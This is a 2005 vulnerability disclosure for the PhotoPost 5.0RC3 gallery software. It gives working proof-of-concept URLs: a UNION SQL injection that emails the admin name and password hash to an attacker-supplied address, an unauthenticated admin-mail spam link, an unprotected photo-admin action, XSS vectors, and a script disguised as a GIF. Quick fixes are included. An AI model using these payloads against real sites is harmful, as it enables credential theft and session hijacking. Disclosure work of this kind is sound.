photopost50rc3.txt

` PhotoPost 5.0RC3, All Enthusiast, Inc, multiple vulnerabilities  
  
March 05 2005  
  
For your consideration.  
  
1. BACKGROUND  
PhotoPost is a popular commercial image publishing software.  
Everyone loves showing off their photos! Add PhotoPost to your site, or let us install it for you,  
and your visitors will be able to upload their photos to galleries on your site and interact in photo  
discussions. Join the 3,500+ sites that are already using PhotoPost and add a fun new dimension to your website.  
....  
Yeah, it is just that bad.  
  
2. IMPACT  
A series of vulnerabilities allows a remote attacker  
- to get arbitrary data from photopost tables (*)  
- to spam administrator mailbox  
- to steal sessions  
- to manipulate photographs  
- TO XSS PhotoPost  
(*) under some configuration, I will describe it in details  
later  
- to upload "image" files with arbitrary content  
  
3. SEVERITY  
HIGH  
  
4. ANALYSIS  
  
4.1 GETTING ARBITRARY DATA FROM PHOTOPOST TABLES  
PhotoPost (further on - PP) is built on a highly risky principle  
of filtering input data, based on magic_quotes:  
=------  
magic_quotes_gpc boolean  
Sets the magic_quotes state for GPC (Get/Post/Cookie) operations.  
When magic_quotes are on, all ' (single-quote), " (double quote), \ (backslash) and NUL's are escaped with a backslash automatically.  
=------  
Turning magic_quotes on is neglected by a large percentage of PP users.  
It is a good idea not to rely on user interaction in the essential matter of  
data filtering and write nested procedures based on on the mysql_escape_string/mysql_real_escape_string  
functions instead. Adding a few native strings of code would have definitely  
fixed that "human" factor.  
Many users do not have any idea what magic_quotes is and  
what it is for and what their negligence will lead them to, even despite a  
warning PP gives while installing. If one were to  
look into architecture PP is assembled upon, it would become clear  
that PP should even not attempt to install itself on systems with  
magic_quotes turned off.  
  
PROOF of CONCEPT  
To see whether PP is running in the environment with magic quotes  
turned off one might use the following URL:  
http://photopost.hosting.site/photopost/member.php?ppaction=rpwd&verifykey=0&uid=0%20union%20select%20"0","[email protected]",%20concat(username,"%20",%20password)%20from%20users  
no login required  
  
* replace [email protected] for your email. If the magic  
quotes turned off you'll get admin MD5 hash and user name on your mail.  
  
* this URL might not work out if the site has an old mySQL version  
=---  
UNION is used to combine the result from many SELECT statements into one result set. UNION is available from MySQL 4.0.0 on  
.....  
=---  
UNION is the only way to effectively exploit PHP based  
queries, due to the security mysql_query provides. It was  
clever of PHP developers not to allow multiple queries  
divided by ';'  
  
QUICK FIX  
.htaccess  
php_value magic_quotes_gpc 1  
  
  
4.2 CODING NEGLIGENCE  
Analysis of the query (I) leads only to another security  
issue with PP. It has plenty unsafe requests like  
  
"SELECT joindate,email,username FROM {$Globals['pp_db_prefix']}users WHERE userid=$uid"  
  
Notice the fact database field userid is compared with  
$uid. $uid is supplied by the user and thereby it's content  
is arbitrary and still there is no quotes, no is_alpha,  
intval check, nothing of the kind. Looking at the code in  
random shows that, from time to time, PP is doing the  
checking but the rule is not universal.  
  
Even if the magic_quotes were turned on it might be possible  
to devise a query that could pass, one way or another  
through and get data posted on your mail anyway. But, the  
example query (I) won't do it. It just constructed to pass through  
several conditions that stands before 'send' is invoked.  
  
QUICK FIX  
1).htaccess  
php_value magic_quotes_gpc 1  
It will at least make it more difficult  
  
4.3 SPAMING ADMINISTRATOR MAILBOX WITH ARBITRARY CONTENT  
PP doesn't always check if the user is authorized. Though,  
as in this particular case, three is a login attempt, it  
won't interact with it's status.  
  
The other problem is that PP absolutely doesn't care how  
much events were served, say - mail sending, how often,  
or how much authorization attempts were done, it is kind of  
a lack of policy, combined it could lead to spam.  
  
PROOF of CONCEPT  
http://photopost.hosting.site/photopost/misc.php?action=reportpost&report=1&final=1  
no login required  
  
using this URL one may spam administrator email with  
arbitrary number of letters and PP won't even try to stop it  
  
QUICK FIX  
adding  
if ($User['userid'] == "") {  
diewell( $Globals['pp_lang']['noreg'] );  
}  
after authenticate() is invoked. in the if($action =  
"reportpost") section should fix the problem with  
unauthorized users.  
  
But it won't fix the problem in general, anyone who is  
authorized will be able to spam administrator.  
  
  
4.4 MANIPULATING USER PHOTOGRAPHS  
The problem is related to adm-photo.php, despite all the rest  
administrator scripts it doesn't require "adm-inc.php".  
adm-inc.php has a built-in check that won't allow anybody  
except administrator to pass further. That fact opens the  
door to the set of administrator functions built into  
adm-photo.php for everyone.  
  
As an example I decided to construct URL that would  
rebuild thumbnails for a picture with a given PID (in our case  
it is 1), namely - it will rotate it clockwise.  
  
ROOF of CONCEPT  
http://photopost.hosting.site/photopost/adm-photo.php?ppaction=manipulate&pid=1&dowhat=rebuildthumb&dowhat=rotateccw  
no login required  
  
I'm not sure it is not one of the "features" but it looks like  
no one but admin should be allowed to to this job.  
  
QUICK FIX  
I believe adding  
require "adm-inc.php";  
will solve the problem.  
  
  
4.5 INSERTING ARBITRARY HTML CODE  
  
XSS1  
  
And finally, there is CSS in the PP.  
  
function check_tags($data, $allowed){  
$data = preg_replace("/<(.*?)>/e",  
"process_tag(stripslashes('\\1'), \$allowed)",  
$data);  
$data = str_replace('javascript:','#',$data);  
return $data;  
}  
  
I won't comment it. This is a very, very bad habit to check  
javascript:  
  
In short, it is possible to form data the way PP will upload  
a given URL. Then it will "check" javascript using this lame  
rule.  
  
XSS2  
PP doesn't check biography field 'editbio' in the user profile,  
so, it can easily contain any arbitrary HTML code, tags,  
javascript, when the personal information is viewed it  
the session might be stolen.  
  
QUICK FIX  
None  
  
4.6 UPLOADING IMAGES WITH ARBITRARY CONTENT  
  
PP allows to upload any file disguised as an image. It  
neither performs check of the file nor it tries to trim it  
to some internal standard. Basically one uploads JS as an  
image into PP then spreads a DIRECT link on the uploaded  
image. IE will execute JS from a broken image transparently.  
  
PROOF OF CONCEPT  
injected.gif  
<script>  
document.write('<img src=http://www.microsoft.com/h/en-us/i/ts_1024_25_BillGWebcastB.jpg>');  
alert('Injected');  
</script>  
  
PP SHOULD load 'as a picture; and then, in case of success,  
save as a pictur' all the uploaded images to guarantee that  
file content is at least image/gif.  
  
QUICK FIX  
None  
  
5. VENDOR STATUS  
  
Informed a week ago by mail. With no response.  
Next time, if I have time to explore sources again, I'll not inform this  
particular vendor. When this article was posted in the private PP forum  
it was removed almost immediately.  
  
Today I've got a letter (not personal) about a new 5.01 release. When  
looking in the fixed files I saw that it really fixes some issues with PP,  
that were described in this article. Especially the e-mail bypass  
will not work in 5.01 under no condition.  
  
I believe you may easily find the vulnerable versions, as well as  
some of the source codes :-) with google.com  
  
  
--   
Best regards  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
`